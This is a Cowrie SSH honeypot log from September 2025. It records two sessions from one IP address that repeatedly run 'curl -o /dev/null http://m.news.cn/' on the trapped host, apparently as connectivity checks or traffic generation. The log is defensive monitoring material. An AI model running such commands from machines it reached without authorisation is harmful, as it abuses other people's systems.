{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.143011Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.202949Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.205224Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:22.208776Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.209677Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:22.222579Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.223735Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.232424Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.261040Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:22.266162Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.267150Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.271193Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:22.274086Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.274816Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.284887Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:22.302383Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.303379Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:22.311582Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.312603Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.315794Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.318524Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:22.342034Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.343115Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.347800Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:22.355261Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.356139Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.362203Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.368560Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:22.381155Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.382087Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.391679Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.393981Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:22.395874Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.396949Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.405385Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:22.419032Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.419974Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.422387Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.424860Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:22.437317Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.438291Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.441303Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:22.458571Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.459642Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:22.476392Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.477298Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:22.501659Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.502646Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.510283Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.511935Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.514539Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:22.518395Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.519292Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:22.538512Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.539617Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:22.563663Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.564360Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.586838Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:22.597329Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.598529Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:22.617120Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.618640Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.633026Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:22.636100Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.637101Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:22.655858Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.657016Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:22.672291Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.673446Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:22.695421Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.698200Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.701187Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:22.708951Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.710082Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:22.738280Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.739448Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:22.746481Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.747583Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:22.778383Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.779556Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:22.783438Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.784283Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.817178Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.825492Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:22.836277Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.837322Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:22.840187Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.841533Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
